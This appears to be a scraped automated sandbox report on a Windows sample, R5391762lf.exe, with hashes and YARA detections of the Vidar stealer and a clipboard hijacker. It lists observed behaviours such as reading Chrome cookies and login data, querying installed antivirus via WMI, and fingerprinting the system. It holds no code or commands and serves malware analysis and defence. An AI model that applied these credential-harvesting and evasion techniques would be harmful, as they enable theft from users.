0_2_05EC80F6

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	0_2_05ED3F87
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,	0_2_05ED49EA
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,	0_2_05ED394D
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,	0_2_05ECC8B7
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	0_2_05EE0AB6
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,	2_2_0043404A
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,	2_2_00438178
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	2_2_00440116
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	2_2_004382A2
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,	2_2_0043834F
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,	2_2_00438423
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: EnumSystemLocalesW,	2_2_004387C8
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: GetLocaleInfoW,	2_2_0043884E
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,	2_2_00432B6D
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,	2_2_00432FAD
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	2_2_004335E7
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,	2_2_00437BB3
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: EnumSystemLocalesW,	2_2_00437E27
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	2_2_00437E83
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	2_2_00437F00
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,	2_2_0042BF17
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,	2_2_00437F83
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	5_2_05DE3F87
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,	5_2_05DE49EA
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,	5_2_05DE394D
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,	5_2_05DDC8B7
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	5_2_05DF0AB6
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	6_2_05EF3F87
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,	6_2_05EF49EA
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,	6_2_05EF394D
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,	6_2_05EEC8B7
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	6_2_05F00AB6

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\R5391762lf.exe

Code function: 0_2_00409DFB GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00409DFB

Source: C:\Users\user\Desktop\R5391762lf.exe

2_2_00419F90

Source: C:\Users\user\Desktop\R5391762lf.exe

Code function: 2_2_0042FE47 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

2_2_0042FE47

Source: C:\Users\user\Desktop\R5391762lf.exe

2_2_00419F90

Source: C:\Users\user\Desktop\R5391762lf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected Clipboard Hijacker

Source: Yara match	File source: 16.2.build3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.mstsca.exe.9215a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.mstsca.exe.9615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.build3.exe.8515a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.mstsca.exe.9615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.mstsca.exe.8615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001E.00000002.2677102464.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3833462867.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2059366101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2676356915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1620588181.0000000000850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.3281999346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.1703198337.0000000000960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2060305239.0000000000920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.1620958954.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.3283314593.0000000000960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Vidar stealer

Source: Yara match	File source: 9.2.build2.exe.1ba15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.build2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.build2.exe.1ba15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1502638549.0000000001BA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1672621226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Remote Access Functionality

Yara detected Vidar stealer

Source: Yara match	File source: 9.2.build2.exe.1ba15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.build2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.build2.exe.1ba15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1502638549.0000000001BA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1672621226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Windows Analysis Report
R5391762lf.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1431221
Product:	CloudBasic
Start time:	17:36:07
Start date:	24.04.2024
Sample:	R5391762lf.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	4f8fb134c680d0e05861a34827751834
SHA1:	5a20d1ff30218dea67d3ff7f61e16e5cc958006f
SHA256:	9c9ed624eaf441b4637d50fe25d386636c5cb59fb69f5b824afc7cec6dfff7f0
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Windows Analysis Report R5391762lf.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
R5391762lf.exe

Malware Threat Intel
Provided by